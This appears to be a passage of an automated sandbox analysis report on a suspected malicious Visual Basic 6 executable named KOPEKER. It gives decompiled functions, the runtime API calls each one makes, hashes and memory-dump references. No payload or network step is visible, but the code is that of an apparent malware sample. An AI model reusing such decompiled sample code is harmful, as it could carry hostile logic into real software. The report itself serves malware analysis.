          				signed int _v36;
          				void* _v40;
          				char _v56;
          				char _v72;
          				intOrPtr _v96;
          				intOrPtr _v104;
          				intOrPtr _v112;
          				char _v120;
          				void* _v124;
          				signed int _v128;
          				intOrPtr* _v132;
          				signed int _v136;
          				intOrPtr _v144;
          				intOrPtr* _v148;
          				signed int _v152;
          				signed int _v156;
          				short _t63;
          				signed int _t66;
          				signed int _t72;
          				signed int _t78;
          				intOrPtr _t93;
          
          				_push(0x4016f6);
          				_push( *[fs:0x0]);
          				 *[fs:0x0] = _t93;
          				L004016F0();
          				_v12 = _t93;
          				_v8 = 0x401530;
          				_v96 = 0x411a30;
          				_v104 = 8;
          				L004018A0();
          				_push(0);
          				_push(3);
          				_push( &_v56);
          				_push( &_v72);
          				L00401810();
          				_v112 = 0x411cf4;
          				_v120 = 0x8008;
          				_push( &_v72);
          				_t63 =  &_v120;
          				_push(_t63);
          				L00401828();
          				_v124 = _t63;
          				_push( &_v72);
          				_push( &_v56);
          				_push(2);
          				L00401942();
          				_t66 = _v124;
          				if(_t66 != 0) {
          					if( *0x4183d8 != 0) {
          						_v148 = 0x4183d8;
          					} else {
          						_push(0x4183d8);
          						_push(0x411ae0);
          						L004018C4();
          						_v148 = 0x4183d8;
          					}
          					_v124 =  *_v148;
          					_t72 =  *((intOrPtr*)( *_v124 + 0x1c))(_v124,  &_v40);
          					asm("fclex");
          					_v128 = _t72;
          					if(_v128 >= 0) {
          						_v152 = _v152 & 0x00000000;
          					} else {
          						_push(0x1c);
          						_push(0x411ad0);
          						_push(_v124);
          						_push(_v128);
          						L00401906();
          						_v152 = _t72;
          					}
          					_v132 = _v40;
          					_v96 = 0x80020004;
          					_v104 = 0xa;
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_t78 =  *((intOrPtr*)( *_v132 + 0x5c))(_v132, 0x10,  &_v36);
          					asm("fclex");
          					_v136 = _t78;
          					if(_v136 >= 0) {
          						_v156 = _v156 & 0x00000000;
          					} else {
          						_push(0x5c);
          						_push(0x411c24);
          						_push(_v132);
          						_push(_v136);
          						L00401906();
          						_v156 = _t78;
          					}
          					_t66 = _v36;
          					_v144 = _t66;
          					_v36 = _v36 & 0x00000000;
          					L00401882();
          					L004018AC();
          				}
          				_v28 = 0x190d6de0;
          				_v24 = 0x5b03;
          				_push(0x4156a6);
          				L00401924();
          				return _t66;
          			}

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 004154E8
          • __vbaVarDup.MSVBVM60 ref: 0041550E
          • #717.MSVBVM60(?,?,00000003,00000000), ref: 0041551F
          • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,00000003,00000000), ref: 0041553A
          • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,00000003,00000000), ref: 0041554D
          • __vbaNew2.MSVBVM60(00411AE0,004183D8), ref: 00415574
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,0000001C), ref: 004155C1
          • __vbaChkstk.MSVBVM60(?), ref: 004155F0
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C24,0000005C), ref: 0041562A
          • __vbaStrMove.MSVBVM60(00000000,?,00411C24,0000005C), ref: 00415654
          • __vbaFreeObj.MSVBVM60(00000000,?,00411C24,0000005C), ref: 0041565C
          • __vbaFreeStr.MSVBVM60(004156A6), ref: 004156A0
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Free$CheckChkstkHresult$#717ListMoveNew2
          • String ID:
          • API String ID: 2511207350-0
          • Opcode ID: 08eef1e3f561d2784ab6a101676d5636d41c4aca24520e826ab253df782c6ced
          • Instruction ID: 08de49b328e945ae8d3490b2afcec97a2dd222b8e44cc5443b5d52720f088425
          • Opcode Fuzzy Hash: 08eef1e3f561d2784ab6a101676d5636d41c4aca24520e826ab253df782c6ced
          • Instruction Fuzzy Hash: A6510571D00608EFDB10DFA1C945BDEBBB9BF04704F60446AE109B72A1DB796A85CF58
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 55%
          			E0041514B(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, char __fp0) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				void* _v24;
          				intOrPtr _v32;
          				char _v40;
          				char _v48;
          				char _v56;
          				char* _v64;
          				char _v72;
          				short _v92;
          				signed int _v100;
          				char* _t33;
          				intOrPtr _t46;
          
          				_push(0x4016f6);
          				_push( *[fs:0x0]);
          				 *[fs:0x0] = _t46;
          				_push(0x50);
          				L004016F0();
          				_v12 = _t46;
          				_v8 = 0x401510;
          				_v48 = 0x80020004;
          				_v56 = 0xa;
          				_v32 = 0x80020004;
          				_v40 = 0xa;
          				_push( &_v56);
          				_push( &_v40);
          				asm("fld1");
          				_v48 = __fp0;
          				asm("fld1");
          				_v56 = __fp0;
          				asm("fld1");
          				_v64 = __fp0;
          				asm("fld1");
          				_v72 = __fp0;
          				L0040181C();
          				L0040193C();
          				asm("fcomp qword [0x401508]");
          				asm("fnstsw ax");
          				asm("sahf");
          				if(__eflags == 0) {
          					_t10 =  &_v100;
          					 *_t10 = _v100 & 0x00000000;
          					__eflags =  *_t10;
          				} else {
          					_v100 = 1;
          				}
          				_v92 =  ~_v100;
          				_push( &_v56);
          				_push( &_v40);
          				_push(2);
          				L00401942();
          				_t33 = _v92;
          				if(_t33 != 0) {
          					_v64 = L"samtaleemnetsrhes";
          					_v72 = 8;
          					L004018A0();
          					_t33 =  &_v40;
          					_push(_t33);
          					L00401816();
          					L00401882();
          					L00401912();
          				}
          				asm("wait");
          				_push(0x415255);
          				L00401924();
          				return _t33;
          			}

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00415166
          • #675.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 004151B8
          • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 004151BD
          • __vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A,?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 004151ED
          • __vbaVarDup.MSVBVM60 ref: 00415211
          • #667.MSVBVM60(?), ref: 0041521A
          • __vbaStrMove.MSVBVM60(?), ref: 00415224
          • __vbaFreeVar.MSVBVM60(?), ref: 0041522C
          • __vbaFreeStr.MSVBVM60(00415255), ref: 0041524F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Free$#667#675ChkstkListMove
          • String ID: samtaleemnetsrhes
          • API String ID: 724837296-85822442
          • Opcode ID: d09b37817b375a3d28831260fac72c9294a75755242a387248ff56af937698f5
          • Instruction ID: 7a57f5c3cb573f693e407fb6fb6044a0ee640fe84f5ae75538ad6d7179837b27
          • Opcode Fuzzy Hash: d09b37817b375a3d28831260fac72c9294a75755242a387248ff56af937698f5
          • Instruction Fuzzy Hash: 3C2162B1800608EBDB05EF91CD46BEEB7B9EF44704F60456EF00176190DBB95E44CB69
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 56%
          			E00414CF3(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr __fp0) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				intOrPtr _v24;
          				long long _v32;
          				short _v36;
          				void* _v40;
          				void* _v44;
          				void* _v48;
          				void* _v52;
          				signed int _v56;
          				intOrPtr* _v60;
          				signed int _v64;
          				intOrPtr* _v72;
          				signed int _v76;
          				signed int _v80;
          				signed int _t41;
          				short _t45;
          				signed int _t51;
          				signed int _t56;
          				intOrPtr _t67;
          
          				_push(0x4016f6);
          				_push( *[fs:0x0]);
          				 *[fs:0x0] = _t67;
          				_t41 = 0x3c;
          				L004016F0();
          				_v12 = _t67;
          				_v8 = 0x4014b8;
          				L00401852();
          				_v24 = __fp0;
          				_push(0x411c18);
          				L00401846();
          				L00401882();
          				_push(_t41);
          				_push(0x411c20);
          				L0040184C();
          				asm("sbb eax, eax");
          				_v52 =  ~( ~( ~_t41));
          				L00401924();
          				_t45 = _v52;
          				if(_t45 != 0) {
          					if( *0x4183d8 != 0) {
          						_v72 = 0x4183d8;
          					} else {
          						_push(0x4183d8);
          						_push(0x411ae0);
          						L004018C4();
          						_v72 = 0x4183d8;
          					}
          					_v52 =  *_v72;
          					_t51 =  *((intOrPtr*)( *_v52 + 0x1c))(_v52,  &_v44);
          					asm("fclex");
          					_v56 = _t51;
          					if(_v56 >= 0) {
          						_v76 = _v76 & 0x00000000;
          					} else {
          						_push(0x1c);
          						_push(0x411ad0);
          						_push(_v52);
          						_push(_v56);
          						L00401906();
          						_v76 = _t51;
          					}
          					_v60 = _v44;
          					_t56 =  *((intOrPtr*)( *_v60 + 0x64))(_v60, 1,  &_v48);
          					asm("fclex");
          					_v64 = _t56;
          					if(_v64 >= 0) {
          						_v80 = _v80 & 0x00000000;
          					} else {
          						_push(0x64);
          						_push(0x411c24);
          						_push(_v60);
          						_push(_v64);
          						L00401906();
          						_v80 = _t56;
          					}
          					_t45 = _v48;
          					_v36 = _t45;
          					L004018AC();
          				}
          				_v32 =  *0x4014b0;
          				asm("wait");
          				_push(0x414e3c);
          				return _t45;
          			}

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00414D0E
          • #535.MSVBVM60(?,?,?,?,004016F6), ref: 00414D20
          • #527.MSVBVM60(00411C18,?,?,?,?,004016F6), ref: 00414D2D
          • __vbaStrMove.MSVBVM60(00411C18,?,?,?,?,004016F6), ref: 00414D37
          • __vbaStrCmp.MSVBVM60(00411C20,00000000,00411C18,?,?,?,?,004016F6), ref: 00414D42
          • __vbaFreeStr.MSVBVM60(00411C20,00000000,00411C18,?,?,?,?,004016F6), ref: 00414D56
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00411C20,00000000,00411C18,?,?,?,?,004016F6), ref: 00414D7A
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,0000001C,?,?,?,?,?,?,?,00411C20,00000000,00411C18), ref: 00414DBE
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C24,00000064,?,?,?,?,?,?,?,00411C20,00000000,00411C18), ref: 00414DFB
          • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00411C20,00000000,00411C18), ref: 00414E14
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$CheckFreeHresult$#527#535ChkstkMoveNew2
          • String ID:
          • API String ID: 2200900967-0
          • Opcode ID: 9a838a82cc72fc940b8cbb677598d1c015845ffd13af8d501d29da7b618deeae
          • Instruction ID: eaf7ab0030bc6f1eb20f90d7ca5afba79f33fe57757848bbb720ed7c03e5ac0a
          • Opcode Fuzzy Hash: 9a838a82cc72fc940b8cbb677598d1c015845ffd13af8d501d29da7b618deeae
          • Instruction Fuzzy Hash: 59311571940208EFCF01EB95D985BEEBBB4BF08B04F10452AF501B62A0DB795984CB59
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 41%
          			E00414A7A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				intOrPtr _v16;
          				char _v40;
          				char _v44;
          				char _v60;
          				signed int _v80;
          				signed int _v84;
          				signed int _v96;
          				intOrPtr* _v100;
          				signed int _v104;
          				char* _t48;
          				signed int _t49;
          				char* _t52;
          				char* _t53;
          				signed int _t58;
          				void* _t68;
          				void* _t70;
          				intOrPtr _t71;
          
          				_t71 = _t70 - 0xc;
          				 *[fs:0x0] = _t71;
          				L004016F0();
          				_v16 = _t71;
          				_v12 = 0x401488;
          				_v8 = 0;
          				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x50,  *[fs:0x0], 0x4016f6, _t68);
          				if(0 != 0) {
          					_t58 =  *((intOrPtr*)( *_a4 + 0x254))(_a4, 0xb);
          					asm("fclex");
          					_v80 = _t58;
          					if(_v80 >= 0) {
          						_v96 = _v96 & 0x00000000;
          					} else {
          						_push(0x254);
          						_push(0x4105b8);
          						_push(_a4);
          						_push(_v80);
          						L00401906();
          						_v96 = _t58;
          					}
          				}
          				_v60 = 1;
          				_t48 =  &_v60;
          				_push(_t48);
          				L00401864();
          				_v80 =  ~(0 | _t48 != 0x0000ffff);
          				L00401912();
          				_t49 = _v80;
          				if(_t49 != 0) {
          					if( *0x4183d8 != 0) {
          						_v100 = 0x4183d8;
          					} else {
          						_push(0x4183d8);
          						_push(0x411ae0);
          						L004018C4();
          						_v100 = 0x4183d8;
          					}
          					_v80 =  *_v100;
          					_t52 =  &_v40;
          					L004018B8();
          					_t53 =  &_v44;
          					L004018BE();
          					_t49 =  *((intOrPtr*)( *_v80 + 0x10))(_v80, _t53, _t53, _t52, _t52);
          					asm("fclex");
          					_v84 = _t49;
          					if(_v84 >= 0) {
          						_v104 = _v104 & 0x00000000;
          					} else {
          						_push(0x10);
          						_push(0x411ad0);
          						_push(_v80);
          						_push(_v84);
          						L00401906();
          						_v104 = _t49;
          					}
          					L004018AC();
          				}
          				_push(0x414bc6);
          				L00401912();
          				return _t49;
          			}

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00414A96
          • __vbaHresultCheckObj.MSVBVM60(00000000,00401488,004105B8,00000254), ref: 00414AEB
          • #560.MSVBVM60(00000001), ref: 00414B04
          • __vbaFreeVar.MSVBVM60(00000001), ref: 00414B1B
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00000001), ref: 00414B3B
          • __vbaObjVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00000001), ref: 00414B5C
          • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00414B66
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000010,?,?,?,?,?,?,?,?,?,00000001), ref: 00414B8F
          • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00000001), ref: 00414BA0
          • __vbaFreeVar.MSVBVM60(00414BC6,00000001), ref: 00414BC0
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Free$CheckHresult$#560AddrefChkstkNew2
          • String ID:
          • API String ID: 70940770-0
          • Opcode ID: b5cdb1583836136bc9da7fd9703093bab2fff25e5d4cf5cd08accfd2c2e6b946
          • Instruction ID: d64d553ebe0e64b1310e3a2d10564cc268948e687aa3ee09596a465f374d7255
          • Opcode Fuzzy Hash: b5cdb1583836136bc9da7fd9703093bab2fff25e5d4cf5cd08accfd2c2e6b946
          • Instruction Fuzzy Hash: 77314770D00208AFDB00EFA1C849BDEBBB4BF04745F10842AF515BB2A1D7B9A985DF58
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 60%
          			E00416BB6(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				intOrPtr _v16;
          				intOrPtr _v28;
          				intOrPtr _v32;
          				void* _v36;
          				signed int _v40;
          				signed int _v52;
          				signed int _t27;
          				signed int _t31;
          				void* _t40;
          				void* _t42;
          				intOrPtr _t43;
          
          				_t43 = _t42 - 0xc;
          				 *[fs:0x0] = _t43;
          				L004016F0();
          				_v16 = _t43;
          				_v12 = 0x401668;
          				_v8 = 0;
          				_t27 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x1c,  *[fs:0x0], 0x4016f6, _t40);
          				_push(1);
          				L004017A4();
          				L00401882();
          				_push(_t27);
          				_push(0x411e98);
          				L0040184C();
          				asm("sbb eax, eax");
          				_v40 =  ~( ~( ~_t27));
          				L00401924();
          				_t31 = _v40;
          				if(_t31 == 0) {
          					L004017C8();
          					L0040193C();
          					asm("fcomp qword [0x401548]");
          					asm("fnstsw ax");
          					asm("sahf");
          					if(__eflags != 0) {
          						L0040183A();
          						_t31 =  *((intOrPtr*)( *_a4 + 0x64))(_a4, _t31);
          						asm("fclex");
          						_v40 = _t31;
          						__eflags = _v40;
          						if(_v40 >= 0) {
          							_t19 =  &_v52;
          							 *_t19 = _v52 & 0x00000000;
          							__eflags =  *_t19;
          						} else {
          							_push(0x64);
          							_push(0x4105b8);
          							_push(_a4);
          							_push(_v40);
          							L00401906();
          							_v52 = _t31;
          						}
          					}
          					_v32 = 0x562c6b10;
          					_v28 = 0x5afc;
          				}
          				asm("wait");
          				_push(0x416ca8);
          				return _t31;
          			}

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00416BD2
          • #525.MSVBVM60(00000001,?,?,?,?,004016F6), ref: 00416BF8
          • __vbaStrMove.MSVBVM60(00000001,?,?,?,?,004016F6), ref: 00416C02
          • __vbaStrCmp.MSVBVM60(00411E98,00000000,00000001,?,?,?,?,004016F6), ref: 00416C0D
          • __vbaFreeStr.MSVBVM60(00411E98,00000000,00000001,?,?,?,?,004016F6), ref: 00416C21
          • __vbaFPInt.MSVBVM60(00411E98,00000000,00000001,?,?,?,?,004016F6), ref: 00416C36
          • __vbaFpR8.MSVBVM60(00411E98,00000000,00000001,?,?,?,?,004016F6), ref: 00416C3B
          • __vbaFpI4.MSVBVM60(00411E98,00000000,00000001,?,?,?,?,004016F6), ref: 00416C51
          • __vbaHresultCheckObj.MSVBVM60(00000000,00401668,004105B8,00000064), ref: 00416C7A
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$#525CheckChkstkFreeHresultMove
          • String ID:
          • API String ID: 4043493740-0
          • Opcode ID: e168a4e3d694ae6a5a74697a6331568a2e76ef4fee398450861547adb4abc302
          • Instruction ID: 86a1e89719f635477d496dccceb2a89c5ea790decd70b889dceaef3fae3058f2
          • Opcode Fuzzy Hash: e168a4e3d694ae6a5a74697a6331568a2e76ef4fee398450861547adb4abc302
          • Instruction Fuzzy Hash: 96215975940208EBDB10AFA5CD05BEE7BB4FF04B44F10816AF445BB1B1DB798A80CB99
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 65%
          			E004163D6(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				intOrPtr _v16;
          				void* _v28;
          				intOrPtr _v32;
          				intOrPtr _v36;
          				signed int _v40;
          				void* _v44;
          				intOrPtr* _v48;
          				signed int _v52;
          				intOrPtr* _v56;
          				signed int _v60;
          				intOrPtr _v72;
          				intOrPtr* _v76;
          				signed int _v80;
          				signed int _v84;
          				signed int _t55;
          				signed int _t60;
          				signed int _t61;
          				void* _t69;
          				void* _t71;
          				intOrPtr _t72;
          
          				_t72 = _t71 - 0xc;
          				 *[fs:0x0] = _t72;
          				L004016F0();
          				_v16 = _t72;
          				_v12 = 0x4015d8;
          				_v8 = 0;
          				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x4016f6, _t69);
          				if( *0x4183d8 != 0) {
          					_v76 = 0x4183d8;
          				} else {
          					_push(0x4183d8);
          					_push(0x411ae0);
          					L004018C4();
          					_v76 = 0x4183d8;
          				}
          				_v48 =  *_v76;
          				_t55 =  *((intOrPtr*)( *_v48 + 0x14))(_v48,  &_v44);
          				asm("fclex");
          				_v52 = _t55;
          				if(_v52 >= 0) {
          					_v80 = _v80 & 0x00000000;
          				} else {
          					_push(0x14);
          					_push(0x411ad0);
          					_push(_v48);
          					_push(_v52);
          					L00401906();
          					_v80 = _t55;
          				}
          				_v56 = _v44;
          				_t60 =  *((intOrPtr*)( *_v56 + 0xe8))(_v56,  &_v40);
          				asm("fclex");
          				_v60 = _t60;
          				if(_v60 >= 0) {
          					_v84 = _v84 & 0x00000000;
          				} else {
          					_push(0xe8);
          					_push(0x411c4c);
          					_push(_v56);
          					_push(_v60);
          					L00401906();
          					_v84 = _t60;
          				}
          				_t61 = _v40;
          				_v72 = _t61;
          				_v40 = _v40 & 0x00000000;
          				L00401882();
          				L004018AC();
          				_v36 = 0xe5db1d70;
          				_v32 = 0x5b00;
          				_push(0x416508);
          				L00401924();
          				return _t61;
          			}

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 004163F2
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,?,?,?,?,004016F6), ref: 00416429
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000014), ref: 0041646D
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,000000E8), ref: 004164AE
          • __vbaStrMove.MSVBVM60 ref: 004164CC
          • __vbaFreeObj.MSVBVM60 ref: 004164D4
          • __vbaFreeStr.MSVBVM60(00416508), ref: 00416502
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$CheckFreeHresult$ChkstkMoveNew2
          • String ID:
          • API String ID: 1253681662-0
          • Opcode ID: 6a38498e2cdce9228928d372c4e3d1505c7f6e7014a28709a69597d88b086051
          • Instruction ID: 185fc35ca0c0ee550ae393e7fd8e4a4c2d830685d3b22869f7f176cff8b22cf3
          • Opcode Fuzzy Hash: 6a38498e2cdce9228928d372c4e3d1505c7f6e7014a28709a69597d88b086051
          • Instruction Fuzzy Hash: 9231E170D40208AFCB00EF95C985BDEBBB5AF08745F60842AE505B62A0D7B9A985DF58
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 56%
          			E00414BE5(void* __ebx, void* __ecx, void* __edi, void* __esi) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				char _v24;
          				void* _v28;
          				long long _v36;
          				signed int _v40;
          				char* _v48;
          				char _v56;
          				intOrPtr* _v60;
          				signed int _v64;
          				signed int _v72;
          				intOrPtr* _v76;
          				signed int _v80;
          				char* _t34;
          				char* _t35;
          				signed int _t41;
          				intOrPtr _t52;
          
          				_push(0x4016f6);
          				_push( *[fs:0x0]);
          				 *[fs:0x0] = _t52;
          				_push(0x3c);
          				L004016F0();
          				_v12 = _t52;
          				_v8 = 0x4014a0;
          				_v48 =  &_v24;
          				_v56 = 0x6003;
          				_t34 =  &_v56;
          				_push(_t34);
          				L0040185E();
          				if(_t34 != 0xffff) {
          					if( *0x4183d8 != 0) {
          						_v76 = 0x4183d8;
          					} else {
          						_push(0x4183d8);
          						_push(0x411ae0);
          						L004018C4();
          						_v76 = 0x4183d8;
          					}
          					_v60 =  *_v76;
          					_t41 =  *((intOrPtr*)( *_v60 + 0x48))(_v60, 0x20,  &_v40);
          					asm("fclex");
          					_v64 = _t41;
          					if(_v64 >= 0) {
          						_v80 = _v80 & 0x00000000;
          					} else {
          						_push(0x48);
          						_push(0x411ad0);
          						_push(_v60);
          						_push(_v64);
          						L00401906();
          						_v80 = _t41;
          					}
          					_v72 = _v40;
          					_v40 = _v40 & 0x00000000;
          					L00401882();
          				}
          				_v36 =  *0x401498;
          				asm("wait");
          				_push(0x414cd8);
          				_t35 =  &_v24;
          				_push(_t35);
          				_push(0);
          				L00401858();
          				L00401924();
          				return _t35;
          			}

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00414C00
          • #556.MSVBVM60(00006003,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00414C23
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00006003,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00414C41
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000048,?,?,?,?,00006003), ref: 00414C87
          • __vbaStrMove.MSVBVM60(?,?,?,?,00006003,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00414CA5
          • __vbaAryDestruct.MSVBVM60(00000000,?,00414CD8,00006003,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00414CCA
          • __vbaFreeStr.MSVBVM60(00000000,?,00414CD8,00006003,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00414CD2
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$#556CheckChkstkDestructFreeHresultMoveNew2
          • String ID:
          • API String ID: 4055419735-0
          • Opcode ID: 30a5a9b54745f6a6728f28e7073e93b5fedf661ae7d45dcf0deff7015f264ccf
          • Instruction ID: 09988e479d3f168dbd1b2dad8c2f4f4398aa50f9cc29315291caccb5a7fa52d0
          • Opcode Fuzzy Hash: 30a5a9b54745f6a6728f28e7073e93b5fedf661ae7d45dcf0deff7015f264ccf
          • Instruction Fuzzy Hash: A9215970D41209AFDB00EF95D945BEEBBB4EF04704F20402AF104B62A0E7B96985CB59
          Uniqueness

          Uniqueness Score: -1.00%